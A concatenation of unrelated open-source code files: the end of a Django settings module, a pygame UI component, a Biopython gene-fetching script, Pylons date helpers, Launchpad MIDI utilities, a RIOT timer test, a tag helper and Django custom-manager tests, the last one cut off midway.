'audio/EVRCB': 'audio',
'audio/EVRCB0': 'audio',
'audio/EVRCB1': 'audio',
'audio/EVRCNW': 'audio',
'audio/EVRCNW0': 'audio',
'audio/EVRCNW1': 'audio',
'audio/EVRCWB': 'audio',
'audio/EVRCWB0': 'audio',
'audio/EVRCWB1': 'audio',
'audio/EVS': 'audio',
'audio/example': 'audio',
'audio/fwdred': 'audio',
'audio/G711-0': 'audio',
'audio/G719': 'audio',
'audio/G7221': 'audio',
'audio/G722': 'audio',
'audio/G723': 'audio',
'audio/G726-16': 'audio',
'audio/G726-24': 'audio',
'audio/G726-32': 'audio',
'audio/G726-40': 'audio',
'audio/G728': 'audio',
'audio/G729': 'audio',
'audio/G7291': 'audio',
'audio/G729D': 'audio',
'audio/G729E': 'audio',
'audio/GSM': 'audio',
'audio/GSM-EFR': 'audio',
'audio/GSM-HR-08': 'audio',
'audio/iLBC': 'audio',
'audio/ip-mr_v2.5': 'audio',
'audio/L8': 'audio',
'audio/L16': 'audio',
'audio/L20': 'audio',
'audio/L24': 'audio',
'audio/LPC': 'audio',
'audio/mobile-xmf': 'audio',
'audio/MPA': 'audio',
'audio/MP4A-LATM': 'audio',
'audio/mpa-robust': 'audio',
'audio/m4a': 'audio',
'audio/midi': 'audio',
'audio/mpeg1': 'audio',
'audio/MPA2': 'audio',
'audio/mpa-robust3': 'audio',
'audio/mpeg3': 'mp3',
'audio/mpeg': 'mp3',
'audio/mp3': 'mp3',
'audio/mp4': 'mp4',
'audio/mpeg4-generic': 'mp4',
'audio/ogg': 'audio',
'audio/opus': 'audio',
'audio/parityfec': 'audio',
'audio/PCMA': 'audio',
'audio/PCMA-WB': 'audio',
'audio/PCMU': 'audio',
'audio/PCMU-WB': 'audio',
'audio/QCELP': 'audio',
'audio/raptorfec': 'audio',
'audio/RED': 'audio',
'audio/rtp-enc-aescm128': 'audio',
'audio/rtploopback': 'audio',
'audio/rtp-midi': 'audio',
'audio/rtx': 'audio',
'audio/SMV': 'audio',
'audio/SMV0': 'audio',
'audio/SMV-QCP': 'audio',
'audio/sp-midi': 'audio',
'audio/speex': 'audio',
'audio/t140c': 'audio',
'audio/t38': 'audio',
'audio/telephone-event': 'audio',
'audio/tone': 'audio',
'audio/UEMCLIP': 'audio',
'audio/ulpfec': 'audio',
'audio/VDVI': 'audio',
'audio/VMR-WB': 'audio',
'audio/vorbis': 'audio',
'audio/vorbis-config': 'audio',
'audio/wav': 'audio',
'audio/wave': 'audio',
'audio/x-flac': 'audio',
'audio/x-mpeg-3': 'mp3',
'audio/x-midi': 'audio',
'audio/x-wav': 'audio',
'video/mpeg': 'mp3',
'video/x-mpeg': 'mp3',
'video/mp4': 'mp4',
'application/msword': 'doc',
'application/vnd.openxmlformats-officedocument.'
'wordprocessingml.document': 'docx',
'application/msexcel': 'xls',
'application/vnd.ms-excel': 'xls',
'application/vnd.openxmlformats-'
'officedocument.spreadsheetml.sheet': 'xlsx',
'text/xml': 'xml',
'application/xml': 'xml',
'text/csv': 'csv',
'text/plain': 'csv',
'image/jpeg': 'jpg',
'image/png': 'png',
'image/gif': 'gif',
'image/tif': 'tiff',
'image/tiff': 'tiff',
'image/bmp': 'image',
'image/x-windows-bmp': 'image',
'application/gpx+xml': 'gpx',
'application/rtf': 'doc',
'application/x-rtf': 'doc',
'application/postscript': 'doc',
'application/x-troff-msvideo': 'video',
'video/avi': 'avi',
'video/msvideo': 'wmv',
'video/x-msvideo': 'wmv',
'video/x-ms-wmv': 'wmv',
'video/quicktime': 'video',
'application/ogg': 'audio',
'image/svg+xml': 'svg',
'audio/x-ms-wma': 'audio',
'application/vnd.oasis.opendocument.spreadsheet': 'ods',
'application/vnd.oasis.opendocument.text': 'odt',
'application/vnd.oasis.opendocument.presentation': 'odd',
'application/vnd.ms-powerpoint': 'ppt',
'application/vnd.openxmlformats-officedocument.presentationml.'
'presentation': 'pptx',
'application/x-iwork-keynote-sffkey': 'key',
'video/x-m4v': 'mp4',
'video/x-matroska': 'video',
}
MIME_LOOKUPS = {
'gpx': 'application/gpx+xml'
}
FILE_UPLOAD_HANDLERS = [
'django.core.files.uploadhandler.TemporaryFileUploadHandler',
]
# the first hasher in this list is the preferred algorithm. any
# password using different algorithms will be converted automatically
# upon login
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
IMPORTERS = {
'csv': 'organization.importers.csv.CSVImporter',
'xls': 'organization.importers.xls.XLSImporter'
}
ES_SCHEME = 'http'
ES_HOST = 'localhost'
ES_PORT = '9200'
ES_MAX_RESULTS = 10000
TOTP_TOKEN_VALIDITY = 3600
TOTP_DIGITS = 6
SMS_GATEWAY = 'accounts.gateways.FakeGateway'
TWILIO_ACCOUNT_SID = os.environ.get('TWILIO_ACCOUNT_SID')
TWILIO_AUTH_TOKEN = os.environ.get('TWILIO_AUTH_TOKEN')
TWILIO_PHONE = '+123'
# Async Tooling
CELERY_BROKER_TRANSPORT = 'sqs' if os.environ.get('SQS') else 'memory'
CELERY_QUEUE_PREFIX = os.environ.get('QUEUE_PREFIX', 'dev')
|
Cadasta/cadasta-platform
|
cadasta/config/settings/default.py
|
Python
|
agpl-3.0
| 17,780 | 0 |
"""
Base class for all nodes in the scene graph. It is implemented
using the composite pattern.
Responsibilities:
- Hold the relative position to its parent.
- Blit itself on the parent.
- Dirty flag itself to trigger regeneration of surface.
"""
class Component(object):
def __init__(self):
self._position = (0, 0)
self._dirty = True
self._surface = None
def draw(self, parent):
self._recreate_surface()
if self._surface and parent:
parent.blit(self._surface, self._position)
def set_position(self, position):
self._position = position
def surface(self):
return None
def dirty(self):
self._dirty = True
def _recreate_surface(self):
if self._dirty:
self._surface = self.surface()
self._dirty = False
"""
Decorator to mark component methods that change the look
of the surface and therefor need to trigger regeneration.
"""
def recreate_surface(function):
def wrapper(self, *args):
self.dirty()
return function(self, *args)
return wrapper
|
sirmar/tetris
|
tetris/visibles/component.py
|
Python
|
mit
| 1,102 | 0.002722 |
from Bio import Entrez
from Bio import SeqIO
from Bio import Seq
from Bio.Alphabet import IUPAC
genomes = ["Escherichia coli str. K-12 substr. MC4100 complete genome","Escherichia coli Nissle 1917, complete genome","Escherichia coli LY180, complete genome"]
genomes_short = ["K12","Nissle","LY180"]
for n,genome in enumerate(genomes):
Entrez.email = "[email protected]"
handle = Entrez.esearch(db="nucleotide", term=genome)
records = Entrez.read(handle)
handle.close()
handle = Entrez.efetch(db="nucleotide", id=records['IdList'][0], rettype="gb", retmode="text")
record = SeqIO.read(handle, "genbank")
handle.close()
mygenes = ["thrA","mogA","dnaK","nhaA","ksgA"]
output_handle=open("seq"+str(n+1)+".fna","w")
for feature in record.features:
if feature.type=='CDS':
if 'gene' in feature.qualifiers:
if feature.qualifiers['gene'][0] in mygenes:
output_handle.write(">%s_%s\n%s\n" % (feature.qualifiers['gene'][0], genomes_short[n], str(feature.extract(record.seq))))
output_handle.close()
|
gditzler/bio-course-materials
|
blast/get_seq.py
|
Python
|
gpl-3.0
| 1,093 | 0.014639 |
from pylons_common.lib.log import create_logger
from pylons_common.lib.utils import pluralize
logger = create_logger('pylons_common.lib.datetime')
from datetime import datetime, timedelta
DATE_FORMAT_ACCEPT = [u'%Y-%m-%d %H:%M:%S', u'%Y-%m-%d %H:%M:%SZ', u'%Y-%m-%d', u'%m-%d-%Y', u'%m/%d/%Y', u'%m.%d.%Y', u'%b %d, %Y']
popular_timezones = [u'US/Eastern', u'US/Central', u'US/Mountain', u'US/Pacific', u'US/Alaska', u'US/Hawaii', u'US/Samoa',
u'Europe/London', u'Europe/Paris', u'Europe/Istanbul', u'Europe/Moscow',
u'America/Puerto_Rico', u'America/Buenos_Aires', u'America/Sao_Paulo',
u'Asia/Dubai', u'Asia/Calcutta', u'Asia/Rangoon', u'Asia/Bangkok', u'Asia/Hong_Kong', u'Asia/Tokyo',
u'Australia/Brisbane', u'Australia/Sydney',
u'Pacific/Fiji']
def convert_date(value):
"""
converts a string into a datetime object
"""
if not value:
return None
if isinstance(value, datetime):
return value
def try_parse(val, format):
try:
dt = datetime.strptime(val, format)
except ValueError:
dt = None
return dt
converted_value = None
for format in DATE_FORMAT_ACCEPT:
converted_value = converted_value or try_parse(value, format)
if not converted_value:
raise ValueError('Cannot convert supposed date %s' % value)
return converted_value
def get_timezones():
import pytz
timezones = {0:u'UTC'}
for tzname in pytz.common_timezones:
tzname = tzname.decode('utf-8')
tz = pytz.timezone(tzname)
dt = datetime.utcnow()
# in theory, this is more elegant, but tz.dst (timezone daylight savings - 0 if off 1 if on) is returning 0 for everything
#offset = tz.utcoffset(dt) - tz.dst(dt)
# we do this try/except to avoid the possibility that pytz fails at localization
# see https://bugs.launchpad.net/pytz/+bug/207500
try:
offset = dt.replace(tzinfo=pytz.utc) - tz.localize(dt)
seconds = offset.days * 86400 + offset.seconds
minutes = seconds / 60
hours = minutes / 60
# adjust for offsets that are greater than 12 hours (these are repeats of other offsets)
if hours > 12:
hours = hours - 24
elif hours < -11:
hours = hours + 24
this_tz = timezones.get(hours, None)
if not this_tz:
timezones[hours] = tzname
elif tzname in popular_timezones:
# overwrite timezones with popular ones if equivalent
timezones[hours] = tzname
except:
logger.exception("Localization failure for timezone " + tzname)
return timezones
def relative_date_str(date, now=None, time=False):
'''
Will return a string like 'Today', 'Tomorrow' etc.
'''
if not now: now = datetime.utcnow()
if not date: return 'unknown'
diff = date.date() - now.date()
def day_time(day_str):
return '%s%s' % (day_str, time and ' at %s' % date.strftime("%I:%M %p") or '')
if diff.days == 0:
return day_time('Today')
elif diff.days == -1:
return day_time('Yesterday')
elif diff.days == 1:
return day_time('Tomorrow')
elif diff.days < 0 and diff.days >= -7:#Within one week back
return '%s ago' % pluralize(-diff.days, '{0} days', '1 day')
elif diff.days > 0 and diff.days < 7:#Within one week back
return 'in %s' % pluralize(diff.days, '{0} days', '1 day')
else:
return date.strftime("%b %e, %Y")## on 10/03/1980
def now():
return datetime.utcnow()
|
benogle/pylons_common
|
pylons_common/lib/date.py
|
Python
|
mit
| 3,799 | 0.010266 |
#
# This file contains functions and constants to talk
# to and from a Novation Launchpad via MIDI.
#
# Created by paul for mididings.
from mididings import *
# MEASURES - constants useful for the Pad
side = list(range(0, 8))
longside = list(range(0, 9))
step = 16 # vertical gap on pad
FirstCtrl = 104 # ctrl of first toprow key
# COLORS
# Colors on the Launchpad are determined by event velocity/value.
# Each key can be lit with red or green light (or both),
# with brightness 0 (off) - 3 (max).
# For convenience, define also the constants:
black = 4 # better not to use zero
red = 3
orange = 19
green = 48
yellow = 51 # better not to use 127
# If you want a darker variant of the above, use fractions (thirds).
# For example, green*2/3 is darker green. (Not for orange!)
def color(g, r):
"This gives the Launchpad color given the amount of green and red."
if g + r == 0:
return black # not zero
else:
return (16 * g) + r
# KEYS
# Each key on the Launchpad is activated by a MIDI event.
# The square keys and the right keys are notes,
# the top keys are control events.
# Rows and columns given the keys (starting from 0)
def row(x):
"This tells the row of the event (square or right)"
return x // step
def column(x):
"This tells us the column of event (right = 8)"
return x % step
def topcol(x):
"The same as colums, but for the top row"
return x - FirstCtrl
# Now the inverses: functions that point exactly to a key on the Launchpad
def right(row):
"This gives the note of a right key at position row"
return (row * step) + 8
def square(row, col):
"This gives the note of a square key at position row,col"
return (row * step) + col
def top(col):
"This gives the ctrl of a top key at position col"
return col + FirstCtrl
# KEY FILTERS
# First filters for notes from square, top, and right keys.
OnlySquare = Filter(NOTE) >> KeyFilter(notes=[square(i, j)
for i in side for j in side])
OnlyRight = KeyFilter(notes=[right(i) for i in side])
OnlyTop = Filter(CTRL) >> CtrlFilter(FirstCtrl + i for i in side)
# Now filters for rows, colums, and single keys.
def RowSqFilter(row):
"This selects only notes from specified row"
return KeyFilter(row * step, right(row)) # no right
def RowFilter(row):
"This selects only notes from specified row"
return KeyFilter(row * step, right(row) + 1) # also right
def ColumnFilter(col):
"This selects only notes from specified column"
return KeyFilter(notes=[square(i, col) for i in side])
def TopFilter(col):
"This selects only specified key from top row"
return CtrlFilter(top(col))
def RightFilter(row):
"This selects only specified key from right"
return KeyFilter(right(row))
def SquareFilter(row, col):
"This selects only specified key from square"
return KeyFilter(square(row, col))
# KEY GENERATORS
def SquareKey(row, col):
"This creates square note with given row and column"
return Key(square(row, col))
def RightKey(row):
"This creates right note with given row"
return Key(right(row))
def TopKey(col, val):
"This creates top ctrl with given column"
return Ctrl(top(col), val)
# NOTES
A = 21
B = 23
C = 24
D = 26
E = 28
F = 29
G = 31
Octave = 12 # semitones
minors = { # scale
0: 0, # interval in semitones
1: 2,
2: 3,
3: 5,
4: 7,
5: 8,
6: 10,
7: 12,
}
minharms = { # scale
0: 0, # interval in semitones
1: 2,
2: 3,
3: 5,
4: 7,
5: 8,
6: 10,
7: 11, # harmonic
}
majors = {
0: 0,
1: 2,
2: 4,
3: 5,
4: 7,
5: 9,
6: 11,
7: 12,
}
dorics = {
0: 0,
1: 2,
2: 3,
3: 5,
4: 7,
5: 9,
6: 10,
7: 12,
}
phrygians = {
0: 0,
1: 1,
2: 3,
3: 5,
4: 7,
5: 8,
6: 10,
7: 12,
}
# I only use these scales - feel free to add your own!
# Now the same thing, but to feed into Transpose:
Minor = [minors[i] - i for i in side]
MinHarm = [minharms[i] - i for i in side]
Major = [majors[i] - i for i in side]
Doric = [dorics[i] - i for i in side]
Phrygian = [phrygians[i] - i for i in side]
# How to use it in practice:
def OctFilter(col, tonic):
return KeyFilter(notes=[(tonic + col + (i * Octave)) for i in longside])
def MakeScale(tonic, scale):
return [OctFilter(i, tonic) >> Transpose(scale[i]) for i in side]
|
m4773rcl0ud/launchpaddings
|
launchpad_utils.py
|
Python
|
gpl-3.0
| 4,442 | 0.00045 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
# Copyright (C) 2017 Francisco Acosta <[email protected]>
# 2017 Freie Universität Berlin
#
# This file is subject to the terms and conditions of the GNU Lesser
# General Public License v2.1. See the file LICENSE in the top level
# directory for more details.
import sys
import time
from testrunner import run
US_PER_SEC = 1000000
INTERNAL_JITTER = 0.05
EXTERNAL_JITTER = 0.15
class InvalidTimeout(Exception):
pass
def testfunc(child):
child.expect(u"Running test (\\d+) times with (\\d+) distinct sleep times")
RUNS = int(child.match.group(1))
SLEEP_TIMES_NUMOF = int(child.match.group(2))
try:
child.expect_exact(u"Please hit any key and then ENTER to continue")
child.sendline(u"a")
start_test = time.time()
for m in range(RUNS):
for n in range(SLEEP_TIMES_NUMOF):
child.expect(u"Slept for (\\d+) us \\(expected: (\\d+) us\\) Offset: (-?\\d+) us")
sleep_time = int(child.match.group(1))
exp = int(child.match.group(2))
upper_bound = exp + (exp * INTERNAL_JITTER)
if not (exp < sleep_time < upper_bound):
delta = (upper_bound-exp)
error = min(upper_bound-sleep_time, sleep_time-exp)
raise InvalidTimeout("Invalid timeout %d, expected %d < timeout < %d"
"\nHost max error\t%d\nerror\t\t%d" %
(sleep_time, exp, upper_bound,
delta, error))
testtime = (time.time() - start_test) * US_PER_SEC
child.expect(u"Test ran for (\\d+) us")
exp = int(child.match.group(1))
lower_bound = exp - (exp * EXTERNAL_JITTER)
upper_bound = exp + (exp * EXTERNAL_JITTER)
if not (lower_bound < testtime < upper_bound):
raise InvalidTimeout("Host timer measured %d us (client measured %d us)" %
(testtime, exp))
except InvalidTimeout as e:
print(e)
sys.exit(1)
if __name__ == "__main__":
sys.exit(run(testfunc))
|
mfrey/RIOT
|
tests/xtimer_usleep/tests/01-run.py
|
Python
|
lgpl-2.1
| 2,231 | 0.001345 |
from flask import g
import re
from sqlalchemy import and_
from sqlalchemy.orm.exc import NoResultFound
from newparp.model import (
CharacterTag,
Tag,
)
special_char_regex = re.compile("[\\ \\./]+")
underscore_strip_regex = re.compile("^_+|_+$")
def name_from_alias(alias):
# 1. Change to lowercase.
# 2. Change spaces to underscores.
# 3. Change . and / to underscores because they screw up the routing.
# 4. Strip extra underscores from the start and end.
return underscore_strip_regex.sub(
"",
special_char_regex.sub("_", alias)
).lower()
def character_tags_from_form(form):
tag_dict = {}
for tag_type in ("fandom", "character", "gender"):
for alias in form[tag_type].split(","):
alias = alias.strip()
if alias == "":
continue
name = name_from_alias(alias)
if name == "":
continue
tag_dict[(tag_type, name)] = alias
character_tags = []
used_ids = set()
for (tag_type, name), alias in tag_dict.items():
try:
tag = g.db.query(Tag).filter(and_(
Tag.type == tag_type, Tag.name == name,
)).one()
except NoResultFound:
tag = Tag(type=tag_type, name=name)
g.db.add(tag)
g.db.flush()
tag_id = (tag.synonym_id or tag.id)
# Remember IDs to skip synonyms.
if tag_id in used_ids:
continue
used_ids.add(tag_id)
character_tags.append(CharacterTag(tag_id=tag_id, alias=alias))
return character_tags
|
MSPARP/newparp
|
newparp/helpers/tags.py
|
Python
|
agpl-3.0
| 1,613 | 0 |
from django.db import models
from django.test import TestCase
from .models import (
Book, Car, CustomManager, CustomQuerySet, DeconstructibleCustomManager,
FastCarAsBase, FastCarAsDefault, FunPerson, OneToOneRestrictedModel,
Person, PersonFromAbstract, PersonManager, PublishedBookManager,
RelatedModel, RestrictedModel,
)
class CustomManagerTests(TestCase):
custom_manager_names = [
'custom_queryset_default_manager',
'custom_queryset_custom_manager',
]
@classmethod
def setUpTestData(cls):
cls.b1 = Book.published_objects.create(
title="How to program", author="Rodney Dangerfield", is_published=True)
cls.b2 = Book.published_objects.create(
title="How to be smart", author="Albert Einstein", is_published=False)
cls.p1 = Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
cls.droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False)
def test_custom_manager_basic(self):
"""
Test a custom Manager method.
"""
self.assertQuerysetEqual(
Person.objects.get_fun_people(), [
"Bugs Bunny"
],
str
)
def test_queryset_copied_to_default(self):
"""
The methods of a custom QuerySet are properly copied onto the
default Manager.
"""
for manager_name in self.custom_manager_names:
with self.subTest(manager_name=manager_name):
manager = getattr(Person, manager_name)
# Public methods are copied
manager.public_method()
# Private methods are not copied
with self.assertRaises(AttributeError):
manager._private_method()
def test_manager_honors_queryset_only(self):
for manager_name in self.custom_manager_names:
with self.subTest(manager_name=manager_name):
manager = getattr(Person, manager_name)
# Methods with queryset_only=False are copied even if they are private.
manager._optin_private_method()
# Methods with queryset_only=True aren't copied even if they are public.
msg = "%r object has no attribute 'optout_public_method'" % manager.__class__.__name__
with self.assertRaisesMessage(AttributeError, msg):
manager.optout_public_method()
def test_manager_use_queryset_methods(self):
"""
Custom manager will use the queryset methods
"""
for manager_name in self.custom_manager_names:
with self.subTest(manager_name=manager_name):
manager = getattr(Person, manager_name)
queryset = manager.filter()
self.assertQuerysetEqual(queryset, ["Bugs Bunny"], str)
self.assertIs(queryset._filter_CustomQuerySet, True)
# Specialized querysets inherit from our custom queryset.
queryset = manager.values_list('first_name', flat=True).filter()
self.assertEqual(list(queryset), ["Bugs"])
self.assertIs(queryset._filter_CustomQuerySet, True)
self.assertIsInstance(queryset.values(), CustomQuerySet)
self.assertIsInstance(queryset.values().values(), CustomQuerySet)
self.assertIsInstance(queryset.values_list().values(), CustomQuerySet)
def test_init_args(self):
"""
The custom manager __init__() argument has been set.
"""
self.assertEqual(Person.custom_queryset_custom_manager.init_arg, 'hello')
def test_manager_attributes(self):
"""
Custom manager method is only available on the manager and not on
querysets.
"""
Person.custom_queryset_custom_manager.manager_only()
msg = "'CustomQuerySet' object has no attribute 'manager_only'"
with self.assertRaisesMessage(AttributeError, msg):
Person.custom_queryset_custom_manager.all().manager_only()
def test_queryset_and_manager(self):
"""
Queryset method doesn't override the custom manager method.
"""
queryset = Person.custom_queryset_custom_manager.filter()
self.assertQuerysetEqual(queryset, ["Bugs Bunny"], str)
self.assertIs(queryset._filter_CustomManager, True)
def test_related_manager(self):
"""
The related managers extend the default manager.
"""
self.assertIsInstance(self.droopy.books, PublishedBookManager)
self.assertIsInstance(self.b2.authors, PersonManager)
def test_no_objects(self):
"""
The default manager, "objects", doesn't exist, because a custom one
was provided.
"""
msg = "type object 'Book' has no attribute 'objects'"
with self.assertRaisesMessage(AttributeError, msg):
Book.objects
def test_filtering(self):
"""
Custom managers respond to usual filtering methods
"""
self.assertQuerysetEqual(
Book.published_objects.all(), [
"How to program",
],
lambda b: b.title
)
def test_fk_related_manager(self):
Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_book=self.b1)
Person.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_book=self.b1)
FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_book=self.b1)
FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_book=self.b1)
self.assertQuerysetEqual(
self.b1.favorite_books.order_by('first_name').all(), [
"Bugs",
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.fun_people_favorite_books.all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='fun_people').all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
def test_gfk_related_manager(self):
Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_thing=self.b1)
Person.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_thing=self.b1)
FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_thing=self.b1)
FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_thing=self.b1)
self.assertQuerysetEqual(
self.b1.favorite_things.all(), [
"Bugs",
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.fun_people_favorite_things.all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='fun_people').all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
def test_m2m_related_manager(self):
bugs = Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.authors.add(bugs)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.authors.add(droopy)
bugs = FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.fun_authors.add(bugs)
droopy = FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.fun_authors.add(droopy)
self.assertQuerysetEqual(
self.b1.authors.order_by('first_name').all(), [
"Bugs",
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.fun_authors.order_by('first_name').all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.authors(manager='fun_people').all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
def test_removal_through_default_fk_related_manager(self, bulk=True):
bugs = FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_book=self.b1)
droopy = FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_book=self.b1)
self.b1.fun_people_favorite_books.remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.filter(favorite_book=self.b1), [
"Bugs",
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.b1.fun_people_favorite_books.remove(bugs, bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.filter(favorite_book=self.b1), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
bugs.favorite_book = self.b1
bugs.save()
self.b1.fun_people_favorite_books.clear(bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.filter(favorite_book=self.b1), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
def test_slow_removal_through_default_fk_related_manager(self):
self.test_removal_through_default_fk_related_manager(bulk=False)
def test_removal_through_specified_fk_related_manager(self, bulk=True):
Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_book=self.b1)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_book=self.b1)
# The fun manager DOESN'T remove boring people.
self.b1.favorite_books(manager='fun_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
# The boring manager DOES remove boring people.
self.b1.favorite_books(manager='boring_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='boring_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
droopy.favorite_book = self.b1
droopy.save()
# The fun manager ONLY clears fun people.
self.b1.favorite_books(manager='fun_people').clear(bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='fun_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
def test_slow_removal_through_specified_fk_related_manager(self):
self.test_removal_through_specified_fk_related_manager(bulk=False)
def test_removal_through_default_gfk_related_manager(self, bulk=True):
bugs = FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_thing=self.b1)
droopy = FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_thing=self.b1)
self.b1.fun_people_favorite_things.remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.order_by('first_name').filter(favorite_thing_id=self.b1.pk), [
"Bugs",
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.b1.fun_people_favorite_things.remove(bugs, bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.order_by('first_name').filter(favorite_thing_id=self.b1.pk), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
bugs.favorite_book = self.b1
bugs.save()
self.b1.fun_people_favorite_things.clear(bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.order_by('first_name').filter(favorite_thing_id=self.b1.pk), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
def test_slow_removal_through_default_gfk_related_manager(self):
self.test_removal_through_default_gfk_related_manager(bulk=False)
def test_removal_through_specified_gfk_related_manager(self, bulk=True):
Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_thing=self.b1)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_thing=self.b1)
# The fun manager DOESN'T remove boring people.
self.b1.favorite_things(manager='fun_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
# The boring manager DOES remove boring people.
self.b1.favorite_things(manager='boring_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
droopy.favorite_thing = self.b1
droopy.save()
# The fun manager ONLY clears fun people.
self.b1.favorite_things(manager='fun_people').clear(bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='fun_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
def test_slow_removal_through_specified_gfk_related_manager(self):
self.test_removal_through_specified_gfk_related_manager(bulk=False)
def test_removal_through_default_m2m_related_manager(self):
bugs = FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.fun_authors.add(bugs)
droopy = FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.fun_authors.add(droopy)
self.b1.fun_authors.remove(droopy)
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Bugs",
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
self.b1.fun_authors.remove(bugs)
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
self.b1.fun_authors.add(bugs)
self.b1.fun_authors.clear()
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
def test_removal_through_specified_m2m_related_manager(self):
bugs = Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.authors.add(bugs)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.authors.add(droopy)
# The fun manager DOESN'T remove boring people.
self.b1.authors(manager='fun_people').remove(droopy)
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
# The boring manager DOES remove boring people.
self.b1.authors(manager='boring_people').remove(droopy)
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
self.b1.authors.add(droopy)
# The fun manager ONLY clears fun people.
self.b1.authors(manager='fun_people').clear()
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.authors(manager='fun_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
def test_deconstruct_default(self):
mgr = models.Manager()
